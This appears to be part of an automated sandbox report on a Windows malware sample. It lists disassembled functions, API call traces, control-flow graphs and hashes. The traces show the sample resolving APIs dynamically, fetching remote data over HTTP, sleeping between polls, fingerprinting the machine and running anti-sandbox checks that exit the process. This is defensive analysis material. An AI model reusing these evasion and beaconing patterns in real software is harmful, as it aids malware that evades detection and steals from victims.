                          • LoadLibraryA.KERNEL32(0111D020,?,00625CA3,00630AEB,?,?,?,?,?,?,?,?,?,?,00630AEA,00630AE3), ref: 0062A095
                          • LoadLibraryA.KERNEL32(0111CE40,?,00625CA3,00630AEB,?,?,?,?,?,?,?,?,?,?,00630AEA,00630AE3), ref: 0062A0A7
                          • LoadLibraryA.KERNEL32(0111D038,?,00625CA3,00630AEB,?,?,?,?,?,?,?,?,?,?,00630AEA,00630AE3), ref: 0062A0B8
                          • GetProcAddress.KERNEL32(75290000,01105B90), ref: 0062A0DA
                          • GetProcAddress.KERNEL32(75290000,0111CE70), ref: 0062A0F2
                          • GetProcAddress.KERNEL32(75290000,01118F78), ref: 0062A10A
                          • GetProcAddress.KERNEL32(75290000,0111CE88), ref: 0062A123
                          • GetProcAddress.KERNEL32(75290000,01105DF0), ref: 0062A13B
                          • GetProcAddress.KERNEL32(73440000,0110B5E0), ref: 0062A160
                          • GetProcAddress.KERNEL32(73440000,01105CD0), ref: 0062A179
                          • GetProcAddress.KERNEL32(73440000,0110B950), ref: 0062A191
                          • GetProcAddress.KERNEL32(73440000,0111CED0), ref: 0062A1A9
                          • GetProcAddress.KERNEL32(73440000,0111CEA0), ref: 0062A1C2
                          • GetProcAddress.KERNEL32(73440000,01105C10), ref: 0062A1DA
                          • GetProcAddress.KERNEL32(73440000,01105AD0), ref: 0062A1F2
                          • GetProcAddress.KERNEL32(73440000,0111CF00), ref: 0062A20B
                          • GetProcAddress.KERNEL32(752C0000,01105DD0), ref: 0062A22C
                          • GetProcAddress.KERNEL32(752C0000,01105C90), ref: 0062A244
                          • GetProcAddress.KERNEL32(752C0000,0111CF18), ref: 0062A25D
                          • GetProcAddress.KERNEL32(752C0000,0111CF90), ref: 0062A275
                          • GetProcAddress.KERNEL32(752C0000,01105C30), ref: 0062A28D
                          • GetProcAddress.KERNEL32(74EC0000,0110B608), ref: 0062A2B3
                          • GetProcAddress.KERNEL32(74EC0000,0110B9C8), ref: 0062A2CB
                          • GetProcAddress.KERNEL32(74EC0000,0111CFA8), ref: 0062A2E3
                          • GetProcAddress.KERNEL32(74EC0000,01105DB0), ref: 0062A2FC
                          • GetProcAddress.KERNEL32(74EC0000,01105D10), ref: 0062A314
                          • GetProcAddress.KERNEL32(74EC0000,0110B978), ref: 0062A32C
                          • GetProcAddress.KERNEL32(75BD0000,0111CFC0), ref: 0062A352
                          • GetProcAddress.KERNEL32(75BD0000,01105AF0), ref: 0062A36A
                          • GetProcAddress.KERNEL32(75BD0000,011190A8), ref: 0062A382
                          • GetProcAddress.KERNEL32(75BD0000,0111D068), ref: 0062A39B
                          • GetProcAddress.KERNEL32(75BD0000,0111CF30), ref: 0062A3B3
                          • GetProcAddress.KERNEL32(75BD0000,01105C50), ref: 0062A3CB
                          • GetProcAddress.KERNEL32(75BD0000,01105BD0), ref: 0062A3E4
                          • GetProcAddress.KERNEL32(75BD0000,0111CFD8), ref: 0062A3FC
                          • GetProcAddress.KERNEL32(75BD0000,0111CF48), ref: 0062A414
                          • GetProcAddress.KERNEL32(75A70000,01105D70), ref: 0062A436
                          • GetProcAddress.KERNEL32(75A70000,0111CF60), ref: 0062A44E
                          • GetProcAddress.KERNEL32(75A70000,0111CFF0), ref: 0062A466
                          • GetProcAddress.KERNEL32(75A70000,0111D080), ref: 0062A47F
                          • GetProcAddress.KERNEL32(75A70000,0111D098), ref: 0062A497
                          • GetProcAddress.KERNEL32(75450000,01105E50), ref: 0062A4B8
                          • GetProcAddress.KERNEL32(75450000,01105B70), ref: 0062A4D1
                          • GetProcAddress.KERNEL32(75DA0000,01105B50), ref: 0062A4F2
                          • GetProcAddress.KERNEL32(75DA0000,0111D0B0), ref: 0062A50A
                          • GetProcAddress.KERNEL32(6F070000,01105D30), ref: 0062A530
                          • GetProcAddress.KERNEL32(6F070000,01105BB0), ref: 0062A548
                          • GetProcAddress.KERNEL32(6F070000,01105B10), ref: 0062A560
                          • GetProcAddress.KERNEL32(6F070000,0111D0C8), ref: 0062A579
                          • GetProcAddress.KERNEL32(6F070000,01105C70), ref: 0062A591
                          • GetProcAddress.KERNEL32(6F070000,01105CB0), ref: 0062A5A9
                          • GetProcAddress.KERNEL32(6F070000,01105B30), ref: 0062A5C2
                          • GetProcAddress.KERNEL32(6F070000,01105BF0), ref: 0062A5DA
                          • GetProcAddress.KERNEL32(6F070000,InternetSetOptionA), ref: 0062A5F1
                          • GetProcAddress.KERNEL32(6F070000,HttpQueryInfoA), ref: 0062A607
                          • GetProcAddress.KERNEL32(75AF0000,0111D2C0), ref: 0062A629
                          • GetProcAddress.KERNEL32(75AF0000,01119078), ref: 0062A641
                          • GetProcAddress.KERNEL32(75AF0000,0111D230), ref: 0062A659
                          • GetProcAddress.KERNEL32(75AF0000,0111D338), ref: 0062A672
                          • GetProcAddress.KERNEL32(75D90000,01105E10), ref: 0062A693
                          • GetProcAddress.KERNEL32(6CF60000,0111D2D8), ref: 0062A6B4
                          • GetProcAddress.KERNEL32(6CF60000,01105E30), ref: 0062A6CD
                          • GetProcAddress.KERNEL32(6CF60000,0111D188), ref: 0062A6E5
                          • GetProcAddress.KERNEL32(6CF60000,0111D140), ref: 0062A6FD
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: AddressProc$LibraryLoad
                          • String ID: HttpQueryInfoA$InternetSetOptionA
                          • API String ID: 2238633743-1775429166
                          • Opcode ID: cf85a5db622e2acc2c70c607782b938061109bf42cc29d83c198998d81a5b989
                          • Instruction ID: 373cc11f1038989b8029869cdf792003cd3a3ec482c17bdffb473e4d08f85fdb
                          • Opcode Fuzzy Hash: cf85a5db622e2acc2c70c607782b938061109bf42cc29d83c198998d81a5b989
                          • Instruction Fuzzy Hash: E862F8B5510304AFC74CDFA8EDD89663BF9F78C603714872AA64AC3264D63DA841DF62
                          Function 00616280 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 191networkfileCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1033 616280-61630b call 62a7a0 call 6147b0 call 62a740 InternetOpenA StrCmpCA 1040 616314-616318 1033->1040 1041 61630d 1033->1041 1042 616509-616525 call 62a7a0 call 62a800 * 2 1040->1042 1043 61631e-616342 InternetConnectA 1040->1043 1041->1040 1061 616528-61652d 1042->1061 1044 616348-61634c 1043->1044 1045 6164ff-616503 InternetCloseHandle 1043->1045 1048 61635a 1044->1048 1049 61634e-616358 1044->1049 1045->1042 1051 616364-616392 HttpOpenRequestA 1048->1051 1049->1051 1053 6164f5-6164f9 InternetCloseHandle 1051->1053 1054 616398-61639c 1051->1054 1053->1045 1056 6163c5-616405 HttpSendRequestA HttpQueryInfoA 1054->1056 1057 61639e-6163bf InternetSetOptionA 1054->1057 1059 616407-616427 call 62a740 call 62a800 * 2 1056->1059 1060 61642c-61644b call 628940 1056->1060 1057->1056 1059->1061 1067 6164c9-6164e9 call 62a740 call 62a800 * 2 1060->1067 1068 61644d-616454 1060->1068 1067->1061 1071 6164c7-6164ef InternetCloseHandle 1068->1071 1072 616456-616480 InternetReadFile 1068->1072 1071->1053 1076 616482-616489 1072->1076 1077 61648b 1072->1077 1076->1077 1080 61648d-6164c5 call 62a9b0 call 62a8a0 call 62a800 1076->1080 1077->1071 1080->1072
                          APIs
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 006147B0: lstrlen.KERNEL32(00000000,00000000,0000003C), ref: 00614839
                            • Part of subcall function 006147B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00614849
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • InternetOpenA.WININET(00630DFE,00000001,00000000,00000000,00000000), ref: 006162E1
                          • StrCmpCA.SHLWAPI(?,0111E858), ref: 00616303
                          • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00616335
                          • HttpOpenRequestA.WININET(00000000,GET,?,0111E2D8,00000000,00000000,00400100,00000000), ref: 00616385
                          • InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 006163BF
                          • HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 006163D1
                          • HttpQueryInfoA.WININET(00000000,00000013,?,00000100,00000000), ref: 006163FD
                          • InternetReadFile.WININET(00000000,?,000007CF,?), ref: 0061646D
                          • InternetCloseHandle.WININET(00000000), ref: 006164EF
                          • InternetCloseHandle.WININET(00000000), ref: 006164F9
                          • InternetCloseHandle.WININET(00000000), ref: 00616503
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Internet$CloseHandleHttp$OpenRequestlstrcpy$ConnectCrackFileInfoOptionQueryReadSendlstrlen
                          • String ID: ERROR$ERROR$GET
                          • API String ID: 3749127164-2509457195
                          • Opcode ID: 1973aed3da6fd50e9f245778c75a310e9171434b1f0448d2215785e284ee8092
                          • Instruction ID: fc439d3a6641b82505cff4c520b5ec6dd9fe3dc1d86902fdf32f1d8572c27806
                          • Opcode Fuzzy Hash: 1973aed3da6fd50e9f245778c75a310e9171434b1f0448d2215785e284ee8092
                          • Instruction Fuzzy Hash: F6715F75A00318ABDB14DFE0DC99BEE77BABB44701F108198F10A6B1D0DBB46A85CF95
                          Function 00625510 Relevance: 23.1, APIs: 7, Strings: 6, Instructions: 383sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1090 625510-625577 call 625ad0 call 62a820 * 3 call 62a740 * 4 1106 62557c-625583 1090->1106 1107 6255d7-62564c call 62a740 * 2 call 611590 call 6252c0 call 62a8a0 call 62a800 call 62aad0 StrCmpCA 1106->1107 1108 625585-6255b6 call 62a820 call 62a7a0 call 611590 call 6251f0 1106->1108 1134 625693-6256a9 call 62aad0 StrCmpCA 1107->1134 1138 62564e-62568e call 62a7a0 call 611590 call 6251f0 call 62a8a0 call 62a800 1107->1138 1123 6255bb-6255d2 call 62a8a0 call 62a800 1108->1123 1123->1134 1139 6256af-6256b6 1134->1139 1140 6257dc-625844 call 62a8a0 call 62a820 * 2 call 611670 call 62a800 * 4 call 626560 call 611550 1134->1140 1138->1134 1142 6257da-62585f call 62aad0 StrCmpCA 1139->1142 1143 6256bc-6256c3 1139->1143 1271 625ac3-625ac6 1140->1271 1161 625991-6259f9 call 62a8a0 call 62a820 * 2 call 611670 call 62a800 * 4 call 626560 call 611550 1142->1161 1162 625865-62586c 1142->1162 1146 6256c5-625719 call 62a820 call 62a7a0 call 611590 call 6251f0 call 62a8a0 call 62a800 1143->1146 1147 62571e-625793 call 62a740 * 2 call 611590 call 6252c0 call 62a8a0 call 62a800 call 62aad0 StrCmpCA 1143->1147 1146->1142 1147->1142 1250 625795-6257d5 call 62a7a0 call 611590 call 6251f0 call 62a8a0 call 62a800 1147->1250 1161->1271 1168 625872-625879 1162->1168 1169 62598f-625a14 call 62aad0 StrCmpCA 1162->1169 1175 6258d3-625948 call 62a740 * 2 call 611590 call 6252c0 call 62a8a0 call 62a800 call 62aad0 StrCmpCA 1168->1175 1176 62587b-6258ce call 62a820 call 62a7a0 call 611590 call 6251f0 call 62a8a0 call 62a800 1168->1176 1198 625a16-625a21 Sleep 1169->1198 1199 625a28-625a91 call 62a8a0 call 62a820 * 2 call 611670 call 62a800 * 4 call 626560 call 611550 1169->1199 1175->1169 1274 62594a-62598a call 62a7a0 call 611590 call 6251f0 call 62a8a0 call 62a800 1175->1274 1176->1169 1198->1106 1199->1271 1250->1142 1274->1169
                          APIs
                            • Part of subcall function 0062A820: lstrlen.KERNEL32(00614F05,?,?,00614F05,00630DDE), ref: 0062A82B
                            • Part of subcall function 0062A820: lstrcpy.KERNEL32(00630DDE,00000000), ref: 0062A885
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00625644
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 006256A1
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00625857
                            • Part of subcall function 0062A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0062A7E6
                            • Part of subcall function 006251F0: StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00625228
                            • Part of subcall function 0062A8A0: lstrcpy.KERNEL32(?,00630E17), ref: 0062A905
                            • Part of subcall function 006252C0: StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00625318
                            • Part of subcall function 006252C0: lstrlen.KERNEL32(00000000), ref: 0062532F
                            • Part of subcall function 006252C0: StrStrA.SHLWAPI(00000000,00000000), ref: 00625364
                            • Part of subcall function 006252C0: lstrlen.KERNEL32(00000000), ref: 00625383
                            • Part of subcall function 006252C0: lstrlen.KERNEL32(00000000), ref: 006253AE
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 0062578B
                          • StrCmpCA.SHLWAPI(00000000,ERROR,00000000), ref: 00625940
                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00625A0C
                          • Sleep.KERNEL32(0000EA60), ref: 00625A1B
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: lstrcpylstrlen$Sleep
                          • String ID: ERROR$ERROR$ERROR$ERROR$ERROR$ERROR
                          • API String ID: 507064821-2791005934
                          • Opcode ID: 52d314e3057db8d4999fa97f4c6e259e50f020682e60a53bfcb6996ccac0f9cb
                          • Instruction ID: b5dd3e5e85718f5bc57bb87ecef09854c135f6dd7141898556707b6f618a2f7c
                          • Opcode Fuzzy Hash: 52d314e3057db8d4999fa97f4c6e259e50f020682e60a53bfcb6996ccac0f9cb
                          • Instruction Fuzzy Hash: 94E11071910A149BCB58FBE0FC969ED733AAF54300F50812CF50766192EF786A49CF9A
                          Function 006217A0 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 162COMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1301 6217a0-6217cd call 62aad0 StrCmpCA 1304 6217d7-6217f1 call 62aad0 1301->1304 1305 6217cf-6217d1 ExitProcess 1301->1305 1309 6217f4-6217f8 1304->1309 1310 6219c2-6219cd call 62a800 1309->1310 1311 6217fe-621811 1309->1311 1313 621817-62181a 1311->1313 1314 62199e-6219bd 1311->1314 1316 621821-621830 call 62a820 1313->1316 1317 621849-621858 call 62a820 1313->1317 1318 6218cf-6218e0 StrCmpCA 1313->1318 1319 62198f-621999 call 62a820 1313->1319 1320 6218ad-6218be StrCmpCA 1313->1320 1321 621932-621943 StrCmpCA 1313->1321 1322 621913-621924 StrCmpCA 1313->1322 1323 621970-621981 StrCmpCA 1313->1323 1324 6218f1-621902 StrCmpCA 1313->1324 1325 621951-621962 StrCmpCA 1313->1325 1326 621835-621844 call 62a820 1313->1326 1327 62187f-621890 StrCmpCA 1313->1327 1328 62185d-62186e StrCmpCA 1313->1328 1314->1309 1316->1314 1317->1314 1341 6218e2-6218e5 1318->1341 1342 6218ec 1318->1342 1319->1314 1339 6218c0-6218c3 1320->1339 1340 6218ca 1320->1340 1347 621945-621948 1321->1347 1348 62194f 1321->1348 1345 621930 1322->1345 1346 621926-621929 1322->1346 1329 621983-621986 1323->1329 1330 62198d 1323->1330 1343 621904-621907 1324->1343 1344 62190e 1324->1344 1349 621964-621967 1325->1349 1350 62196e 1325->1350 1326->1314 1337 621892-62189c 1327->1337 1338 62189e-6218a1 1327->1338 1335 621870-621873 1328->1335 1336 62187a 1328->1336 1329->1330 1330->1314 1335->1336 1336->1314 1355 6218a8 1337->1355 1338->1355 1339->1340 1340->1314 1341->1342 1342->1314 1343->1344 1344->1314 1345->1314 1346->1345 1347->1348 1348->1314 1349->1350 1350->1314 1355->1314
                          APIs
                          • StrCmpCA.SHLWAPI(00000000,block), ref: 006217C5
                          • ExitProcess.KERNEL32 ref: 006217D1
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: ExitProcess
                          • String ID: block
                          • API String ID: 621844428-2199623458
                          • Opcode ID: 63e04a3ba553c89866042486a4693119c98102b8b6b68fb1cdd453caa4003eb3
                          • Instruction ID: 93b459f46dbee740c35af74b9dc6fd4eea69708303bc3bafee22c005168e11af
                          • Opcode Fuzzy Hash: 63e04a3ba553c89866042486a4693119c98102b8b6b68fb1cdd453caa4003eb3
                          • Instruction Fuzzy Hash: 4D514EB4A08619EFDB04DFA0E9A4ABE77BBBF55704F108058E4056B340D774E986CF62
                          Function 00627500 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 106memoryCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          • Executed
                          • Not Executed
                          control_flow_graph 1356 627500-62754a GetWindowsDirectoryA 1357 627553-6275c7 GetVolumeInformationA call 628d00 * 3 1356->1357 1358 62754c 1356->1358 1365 6275d8-6275df 1357->1365 1358->1357 1366 6275e1-6275fa call 628d00 1365->1366 1367 6275fc-627617 GetProcessHeap RtlAllocateHeap 1365->1367 1366->1365 1369 627628-627658 wsprintfA call 62a740 1367->1369 1370 627619-627626 call 62a740 1367->1370 1377 62767e-62768e 1369->1377 1370->1377
                          APIs
                          • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 00627542
                          • GetVolumeInformationA.KERNEL32(?,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 0062757F
                          • GetProcessHeap.KERNEL32(00000000,00000104), ref: 00627603
                          • RtlAllocateHeap.NTDLL(00000000), ref: 0062760A
                          • wsprintfA.USER32 ref: 00627640
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.1874916408.0000000000611000.00000040.00000001.01000000.00000003.sdmp, Offset: 00610000, based on PE: true
                          • Associated: 00000000.00000002.1874878897.0000000000610000.00000004.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006C1000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006CD000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.00000000006F2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1874916408.000000000085A000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.000000000086E000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.00000000009E3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ABB000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000ADC000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AE3000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1875587313.0000000000AF2000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876148035.0000000000AF3000.00000080.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876246903.0000000000C82000.00000040.00000001.01000000.00000003.sdmpDownload File
                          • Associated: 00000000.00000002.1876261548.0000000000C83000.00000080.00000001.01000000.00000003.sdmpDownload File
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_610000_file.jbxd
                          Yara matches
                          Similarity
                          • API ID: Heap$AllocateDirectoryInformationProcessVolumeWindowslstrcpywsprintf
                          • String ID: :$C$\$c
                          • API String ID: 1544550907-1184480125
                          • Opcode ID: 2750867a588d834e315c2eefb1632ae3ca11489e2d34bcd1cc2167b9f4b6c6b0
                          • Instruction ID: 61aec751c785677a1565b404cf6b125ab26905fbbc768e8ab776fc14773719e2
                          • Opcode Fuzzy Hash: 2750867a588d834e315c2eefb1632ae3ca11489e2d34bcd1cc2167b9f4b6c6b0
                          • Instruction Fuzzy Hash: 204181B1904658ABDB10DB94EC85FDEBBB9AF08701F100198F50967280DB78AA44CFA5
                          Function 006269F0 Relevance: 9.1, APIs: 6, Instructions: 89sleepCOMMON
                          Download Yara Rule

                          Control-flow Graph

                          APIs
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01112320), ref: 006298A1
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01112338), ref: 006298BA
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01112350), ref: 006298D2
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01112380), ref: 006298EA
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01112428), ref: 00629903
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01118F48), ref: 0062991B
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01105750), ref: 00629933
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01105810), ref: 0062994C
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,011123C8), ref: 00629964
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01112368), ref: 0062997C
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,011123E0), ref: 00629995
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,011123F8), ref: 006299AD
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01105930), ref: 006299C5
                            • Part of subcall function 00629860: GetProcAddress.KERNEL32(74DD0000,01112410), ref: 006299DE
                            • Part of subcall function 0062A740: lstrcpy.KERNEL32(00630E17,00000000), ref: 0062A788
                            • Part of subcall function 006111D0: ExitProcess.KERNEL32 ref: 00611211
                            • Part of subcall function 00611160: GetSystemInfo.KERNEL32(?), ref: 0061116A
                            • Part of subcall function 00611160: ExitProcess.KERNEL32 ref: 0061117E
                            • Part of subcall function 00611110: GetCurrentProcess.KERNEL32(00000000,000007D0,00003000,00000040,00000000), ref: 0061112B
                            • Part of subcall function 00611110: VirtualAllocExNuma.KERNEL32(00000000), ref: 00611132
                            • Part of subcall function 00611110: ExitProcess.KERNEL32 ref: 00611143
                            • Part of subcall function 00611220: GlobalMemoryStatusEx.KERNEL32(00000040,?,00000000,00000040), ref: 0061123E
                            • Part of subcall function 00611220: __aulldiv.LIBCMT ref: 00611258
                            • Part of subcall function 00611220: __aulldiv.LIBCMT ref: 00611266
                            • Part of subcall function 00611220: ExitProcess.KERNEL32 ref: 00611294
                            • Part of subcall function 00626770: GetUserDefaultLangID.KERNEL32 ref: 00626774
                            • Part of subcall function 00611190: ExitProcess.KERNEL32 ref: 006111C6
                            • Part of subcall function 00627850: GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,006111B7), ref: 00627880
